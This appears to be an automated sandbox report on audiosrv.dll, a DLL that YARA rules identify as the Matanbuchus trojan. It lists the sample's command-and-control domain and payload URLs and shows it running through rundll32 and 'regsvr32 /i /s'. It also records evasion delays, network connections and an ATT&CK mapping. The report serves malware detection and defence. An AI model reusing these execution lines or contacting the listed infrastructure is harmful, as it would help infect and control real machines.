Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmly
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/S_1
Source: regsvr32.exe, 00000003.00000003.2401707553.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/V
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/cies
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/ot
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/s
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/tificate
Source: audiosrv.dll	String found in binary or memory: https://sectigo.com/CPS0
Source: audiosrv.dll	String found in binary or memory: https://sectigo.com/CPS0D
Source: regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.godaddy.com/websites/website-builder?isc=pwugc&utm_source=wsb&utm_medium=applica

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811

Source: unknown	HTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.5:49811 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: audiosrv.dll, type: SAMPLE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: audiosrv.dll, type: SAMPLE	Matched rule: Windows_Trojan_Matanbuchus_c7811ccc Author: unknown
Source: 00000003.00000002.2427764945.0000000010001000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000003.00000002.2427764945.0000000010001000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_c7811ccc Author: unknown

Source: audiosrv.dll

Static PE information: invalid certificate

Source: audiosrv.dll

Binary or memory string: OriginalFilenamesmphost.dllj% vs audiosrv.dll

Source: audiosrv.dll

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL

Source: audiosrv.dll, type: SAMPLE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: audiosrv.dll, type: SAMPLE	Matched rule: Windows_Trojan_Matanbuchus_c7811ccc reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 05f209a24d9eb2be7fa50444d8271b6f147027291f55a352ac3af5e9b3207010, id = c7811ccc-5d8d-4bc8-a630-ac3282bb207e, last_modified = 2022-04-12
Source: 00000003.00000002.2427764945.0000000010001000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000003.00000002.2427764945.0000000010001000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_c7811ccc reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 05f209a24d9eb2be7fa50444d8271b6f147027291f55a352ac3af5e9b3207010, id = c7811ccc-5d8d-4bc8-a630-ac3282bb207e, last_modified = 2022-04-12

Source: classification engine

Classification label: mal64.troj.evad.winDLL@14/0@1/1

Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\user-PC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03

Source: audiosrv.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\audiosrv.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\audiosrv.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\audiosrv.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\audiosrv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\audiosrv.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\audiosrv.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\audiosrv.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\audiosrv.dll,DllUnregisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\audiosrv.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\audiosrv.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\audiosrv.dll,DllInstall	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\audiosrv.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\audiosrv.dll,DllUnregisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\audiosrv.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: audiosrv.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: audiosrv.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: audiosrv.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: audiosrv.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: audiosrv.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: audiosrv.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: audiosrv.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: audiosrv.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: audiosrv.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: audiosrv.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: audiosrv.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: audiosrv.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected Matanbuchus

Source: Yara match

File source: audiosrv.dll, type: SAMPLE

Source: audiosrv.dll

Static PE information: real checksum: 0x28fca should be: 0x28f8a

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\audiosrv.dll

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5464	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 320	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe

Network Connect: 76.223.105.230 443

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\audiosrv.dll",#1

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Regsvr32	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Rundll32	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Virtualization/Sandbox Evasion	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 System Information Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
manageintel.com	76.223.105.230	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml	true		unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7osDJT9g.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2	regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2)	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	audiosrv.dll	false	URL Reputation: safe	unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7ksDJT9g.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
